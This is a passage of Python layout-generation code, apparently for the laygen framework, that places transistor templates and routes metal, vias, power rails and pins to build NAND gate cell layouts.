laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in4.name, refinstindex0=np.array([i, 0]), refinstname1=in4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) # power and groud rail xy = laygen.get_xy(obj = ip5.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip5.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in5.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['A', 'B', 'O'], rect_list=[ra0, rb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_nand(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I" + objectname_pfix + 'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I" + objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_body, gridname = pg, refinstname = in3.name, shape=np.array([m, 1])) in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_boundary, gridname = pg, refinstname = in4.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_body, gridname = pg, refinstname = ip3.name, transform='MX', shape=np.array([m, 1])) ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip4.name, transform='MX') # route # b0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # a0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=ip4.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='G0', gridname=rg_m2m3) # internal connection between mos laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in4.name, refpinname1='S1', refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) # output if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='S1', refinstindex=np.array([m - 1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip4.name, refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip4.name, refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) # power and groud rail xy = laygen.get_xy(obj = in5.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip5.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in5.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['A', 'B', 'O'], rect_list=[ra0, rb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_nand_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body_2stack, devname_pmos_boundary, devname_pmos_body_left, devname_pmos_body_right, pin_o_yindex=0, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body_2stack, gridname = pg, refinstname = in0.name) #in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_body_right, gridname = pg, refinstname = in1.name) in2 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body_left, gridname = pg, refinstname = ip0.name, transform='MX') ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_body_right, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX') # route # B laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") rb0 = laygen.route("R"+objectname_pfix+"A0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # A laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G1', refinstname1=ip2.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='G0', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip2.name, refpinname0='G0', refinstname1=ip2.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") ra0 = laygen.route("R"+objectname_pfix+"B0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G1', refinstname1=in1.name, refpinname1='G1') laygen.via(None, np.array([-1, 0]), refinstname=ip2.name, refpinname='G0', gridname=rg_m2m3) # output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, pin_o_yindex]), xy1=np.array([0, pin_o_yindex]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in1.name, refpinname1='D0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, pin_o_yindex]), xy1=np.array([0, pin_o_yindex]), gridname0=rg_m2m3, refinstname0=ip2.name, refpinname0='D0', refinstname1=ip2.name, refpinname1='D0') ro0 = laygen.route("R"+objectname_pfix+"O0", laygen.layers['metal'][3], xy0=np.array([0, pin_o_yindex]), xy1=np.array([0, pin_o_yindex]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=ip2.name, refpinname1='D0') laygen.via(None, np.array([0, pin_o_yindex]), refinstname=in1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, pin_o_yindex]), refinstname=ip2.name, refpinname='S0', gridname=rg_m1m2) laygen.via(None, np.array([0, pin_o_yindex]), refinstname=in1.name, refpinname='D0', gridname=rg_m2m3) laygen.via(None, np.array([0, pin_o_yindex]), refinstname=ip2.name, refpinname='D0', gridname=rg_m2m3) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstname1=ip1.name) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2) xy_d0 = laygen.get_template_pin_xy(ip2.cellname, 'D0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_d0*np.array([1, 0]), xy1=xy_d0, gridname0=rg_m1m2, refinstname0=ip2.name, refinstname1=ip2.name) laygen.via(None, xy_d0 * np.array([1, 0]), refinstname=ip2.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R" + objectname_pfix + "VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip3.name) rvss = laygen.route("R" + objectname_pfix + "VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['A', 'B', 'O'], rect_list=[ra0, rb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_nand_match(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, devname_pmos_dmy, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m*2, 1])) in2 = laygen.relplace(name = "I" + objectname_pfix + 'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I" + objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_body, gridname = pg, refinstname = in3.name, shape=np.array([m*2, 1])) in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_boundary, gridname = pg, refinstname = in4.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip1_sp = laygen.relplace(name = "I"+objectname_pfix + 'P1_SP', templatename = devname_pmos_dmy, gridname = pg, refinstname = ip1.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1_sp.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_body, gridname = pg, refinstname = ip3.name, transform='MX', shape=np.array([m, 1])) ip4_sp = laygen.relplace(name = "I"+objectname_pfix + 'P4_SP', templatename = devname_pmos_dmy, gridname = pg, refinstname = ip4.name, transform='MX', shape=np.array([m, 1])) ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip4_sp.name, transform='MX') # route # b0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) for i in range(m*2): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m*2 - 1, 0]), endstyle0="extend", endstyle1="extend") rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m*2 - 1, 0])) rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # a0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) for i in range(m*2): laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m*2 - 1, 0]), endstyle0="extend", endstyle1="extend") ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=in4.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m*2 - 1, 0])) ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='G0', gridname=rg_m2m3) # internal connection between mos laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in4.name, refpinname1='S1', refinstindex1=np.array([m*2 - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m*2): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S1', refinstindex=np.array([m*2-1, 0]), gridname=rg_m1m2) # output if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m*2-1, 0]), endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m*2-1, 0])) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m*2): laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='S1', refinstindex=np.array([m - 1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m*2): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip4.name, refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m*2): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], 